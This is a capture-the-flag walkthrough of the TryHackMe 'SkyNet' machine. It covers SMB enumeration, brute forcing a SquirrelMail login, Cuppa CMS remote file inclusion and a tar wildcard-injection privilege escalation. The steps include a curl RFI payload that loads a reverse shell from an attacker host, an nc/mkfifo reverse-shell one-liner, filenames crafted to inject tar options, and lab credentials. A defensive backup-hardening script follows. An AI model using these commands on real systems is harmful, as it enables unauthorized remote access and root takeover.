# THM Machine: SkyNet

### Information Gathering

I got an IP address from `TryHackMe` and used the `export` command to store it in a Linux `environment` variable.

```bash
export ip=10.10.108.117
```

### Scanning

Starting off with a simple `nmap` scan to find the open ports and the services running on them, using the following command.

```bash
$ nmap -sCV --min-rate 100 --max-rate 200 $ip

PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http
|_http-title: Skynet
110/tcp open  pop3
|_pop3-capabilities: RESP-CODES CAPA TOP PIPELINING AUTH-RESP-CODE SASL UIDL
139/tcp open  netbios-ssn
143/tcp open  imap
|_imap-capabilities: Pre-login LOGINDISABLEDA0001 IDLE LITERAL+ SASL-IR more have post-login listed ENABLE capabilities IMAP4rev1 OK ID LOGIN-REFERRALS
445/tcp open  microsoft-ds

Host script results:
|_clock-skew: mean: 1h37m20s, deviation: 2h53m12s, median: -2m40s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2022-08-16T07:27:24-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-08-16T12:27:24
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
```

The `nmap` scan results show the following open ports on the system.

* `22` for `SSH`
* `80` for `HTTP`
* `110` for `pop3`
* `139` for `netbios`
* `143` for `IMAP`
* `445` for `SMB`, shown as `microsoft-ds` in the scan result.

### Enumeration

Start the enumeration with the `smb` server to see how many `shares` it has and whether we can access any of them without credentials. The `SMB` service often gives us lots of information such as `Users`, `Domain Name`, `Computer Name`, etc.

**SMB**

**Listing The Shares**

```bash
$ smbclient -L //$ip/

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SKYNET
```

From the above share listing, we can see two shares that are not present by default, i.e. `anonymous` and `milesdyson`. We can try to access them without giving a password.

```bash
smbclient //$ip/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 21:04:00 2020
  ..                                  D        0  Tue Sep 17 12:20:17 2019
  attention.txt                       N      163  Wed Sep 18 08:04:59 2019
  logs                                D        0  Wed Sep 18 09:42:16 2019

		9204224 blocks of size 1024. 5818464 blocks available
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 09:42:16 2019
  ..                                  D        0  Thu Nov 26 21:04:00 2020
  log2.txt                            N        0  Wed Sep 18 09:42:13 2019
  log1.txt                            N      471  Wed Sep 18 09:41:59 2019
  log3.txt                            N        0  Wed Sep 18 09:42:16 2019

		9204224 blocks of size 1024. 5818460 blocks available
```

We had success with the `anonymous` share and found some files in it. On inspection, `log1.txt` looks like a password list, and `attention.txt` contains some information as well, including the name `Miles Dyson`. We also saw a share named after him.

**HTTP**

Now we start enumerating the `HTTP` server. On a web server we are usually interested in login pages, hidden files and directories, any information about a `CMS` and its version if applicable, and the backend technologies and their versions. Once we know these, we look for vulnerabilities in them.

**Content-Discovery Result**

```bash
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ

admin                   [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 188ms]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 188ms]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
config                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 189ms]
ai                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
squirrelmail            [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 248ms]
```

Running `ffuf` for content discovery found some directories, among them `squirrelmail`, which has a login page. I fuzzed the login with `milesdyson` as the username and `log1.txt` as the password list to find valid credentials; the command is as follows.

```bash
$ ffuf -w log1.txt:FUZZ -u http://10.10.108.117/squirrelmail/src/redirect.php -X POST -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-Type: application/x-www-form-urlencoded" -fs 1789
```

From the above:

* `-w` specifies the wordlist, in this case the `log1.txt` file.
* `:FUZZ` sets the fuzzing keyword for that wordlist; `:` is the separator and `FUZZ` is the actual keyword. It can be omitted for a single list, but with multiple lists each one must be given a different keyword.
* `-u` specifies the URL.
* `-X` specifies the request method.
* `-d` specifies the request body data.
* `-H` specifies a request header, here `Content-Type: application/x-www-form-urlencoded`, which must be supplied because we are sending POST parameters in the body.
* `-fs` filters results by response size. Most responses (the ones for wrong credentials) had the same size, so filtering out that size leaves only the few responses that indicate a valid login.

Using the above command, we got a valid login credential.

**Valid Credentials**

```
milesdyson:cyborg007haloterminator
```

Using the above credentials we can log in to `squirrelmail`, a webmail interface for sending and receiving email. There we see that the user `milesdyson` has some emails we can read; one of them says the following.

**Samba Password reset**

```
We have changed your smb password after the system malfunction.
Password: )s{A&2Z=F^n_E.B`
```

Another password found.

**Other Emails and their content**

```
From: serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

---
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
```

Nothing special there.

**SMB - Miles**

We now have the SMB password for `milesdyson`, so we can log in with it.

```bash
$ smbclient //$ip/milesdyson -U milesdyson

Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 17 14:05:47 2019
  ..                                  D        0  Wed Sep 18 08:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 14:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 14:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 14:05:14 2019
  notes                               D        0  Tue Sep 17 14:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 14:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 14:05:14 2019

		9204224 blocks of size 1024. 5818448 blocks available
smb: \> cd notes
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 14:18:40 2019
  ..                                  D        0  Tue Sep 17 14:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 14:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 14:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 14:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 14:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 14:01:29 2019
  important.txt                       N      117  Tue Sep 17 14:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 14:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 14:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 14:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 14:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 14:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 14:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 14:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 14:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 14:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 14:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 14:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 14:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 14:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 14:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 14:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 14:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 14:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 14:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 14:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 14:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 14:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 14:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 14:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 14:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 14:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 14:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 14:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 14:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 14:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 14:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 14:01:29 2019

		9204224 blocks of size 1024. 5818448 blocks available
```

From the above we see that the `milesdyson` share holds many files, but one catches my eye: `important.txt`. The **important.txt** file contains something useful.

```
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```

Above we see a to-do list mentioning some things about his life and work, but we are only interested in `/45kra24zxs28v3yd`, which looks very much like an HTTP directory; visiting it confirms it is a valid web directory. There is nothing obvious to exploit on it, so I started another `ffuf` scan for content discovery.

**Content-Discovery - /45kra24zxs28v3yd**

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:F -u http://$ip/45kra24zxs28v3yd/F -o ffuf2.log -ic

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.108.117/45kra24zxs28v3yd/F
 :: Wordlist         : F: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Output file      : ffuf2.log
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

administrator           [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 188ms]
```

Found an `administrator` endpoint, very nice!

### Exploitation & Initial Access

The administrator page identifies the application as Cuppa `CMS`, and `searchsploit cuppa cms` turns up a potential `RFI` (Remote File Inclusion) vulnerability. Knowing that, I downloaded the PHP reverse shell from `pentest monkey`, changed the IP and port in it, and hosted the file with a Python HTTP server. Then I used the following command, which exploits the RFI: the server fetches our `shell.php` file and executes it, giving us a reverse shell.

> **Note:** Open your listener using `nc -lvnp 4444` before running the following command.

```bash
# urlConfig must point at the host serving shell.php (the attacker machine,
# 10.8.186.33 in the later reverse-shell step), not at the target held in $ip.
curl "http://10.10.108.117/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.186.33/shell.php"
```

### Privilege Escalation

After gaining access to the system as the low-privilege user `www-data`, I started enumerating the system: `SUID` binaries, `sudo` permissions, etc. Nothing special turned up until I used the following command to read the `crontab` file.

```shell
cat /etc/crontab
```

There is a `cronjob` run by the `root` user that executes `/home/milesdyson/backups/backup.sh` every minute. I checked whether I could read `backup.sh`; I can, and it has the following content.

```shell
www-data@skynet:/home/milesdyson/backups$ ll
total 1640
-rwxr-xr-x 1 root root      74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root root 4413440 Aug 16 09:58 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```

The script backs up everything in `/var/www/html` into `backup.tgz`. One thing to note: it uses the wildcard `*`, which the shell expands to every file and directory in that location. This is risky because of a technique called wildcard injection: we can create files whose names look like command-line arguments, just as `-al` is an argument to `ls` that lists all files. For the `tar` binary there is a documented way to execute a command with the following method.

```bash
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.186.33 5555 >/tmp/f" > shell.sh
```

Above we create a file `shell.sh` in `/var/www/html` containing a reverse shell command. Then we use the following commands to create files whose names look like arguments to `tar`, which eventually executes `shell.sh`.

```bash
$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
$ touch "/var/www/html/--checkpoint=1"
```

> **Recap:** We create three files in `/var/www/html`: `--checkpoint-action=exec=sh shell.sh`, `--checkpoint=1`, and `shell.sh`, which holds our reverse shell command.

So when the `cronjob` runs `tar`, the shell expands `*` and passes those filenames as arguments, and `tar` executes our shell command. `--checkpoint-action=exec=` is a legitimate `tar` option that runs a system command whenever a checkpoint is reached, and `--checkpoint=1` triggers a checkpoint after every record. By following the above method, I eventually received a reverse shell back as the root user.

> **Note**: Start your listener with `nc -lvnp 5555` before the cron job runs so you can catch the reverse shell.
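The fix a defender would want here, as an added example that is not part of the original writeup: the same backup written so the wildcard cannot feed option-looking filenames to `tar`, plus a quick check that flags such names in a directory a privileged job archives. The scratch directory and its file names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not the machine's backup.sh): a backup that cannot be
# hijacked by option-looking filenames, plus a detection helper.
set -eu

# Constructed fixture: a scratch "web root" with a normal file and a file
# whose name looks like a tar option, as in the attack described above.
make_webroot() {
    dir=$(mktemp -d)
    printf 'hello\n' > "$dir/index.html"
    : > "$dir/--checkpoint=1"
    printf '%s\n' "$dir"
}

# Vulnerable pattern from the page (for reference only, not run here):
#   cd /var/www/html && tar cf /home/milesdyson/backups/backup.tgz *
# The shell expands "*" and tar parses "--checkpoint=1" as an option.
#
# Hardened pattern: archive "." from inside the directory (-C), so every
# member is a path under "./" and no filename can be read as an option.
safe_backup() {
    src=$1
    out=$2
    tar -cf "$out" -C "$src" .
}

# Detection: count top-level entries whose names begin with "-" in a
# directory that a root cron job archives; any hit deserves a look.
count_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

# Confirm a member landed in the archive as data rather than as an option.
archive_has_member() {
    tar -tf "$1" | grep -qx -- "$2"
}

if [ "${1:-}" = "demo" ]; then
    root=$(make_webroot)
    out=$(mktemp)
    safe_backup "$root" "$out"
    echo "option-like names in $root: $(count_option_like_names "$root")"
    tar -tf "$out"
fi
```

Run the script with the argument `demo` to see the archive listing; with the hardened form the odd filename appears as the member `./--checkpoint=1` instead of being consumed as a `tar` option.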

Now that you are `root`, copy the flags, submit them to TryHackMe, and the machine is solved.

```bash
$ cat /home/*/user.txt && cat /root/root.txt
```

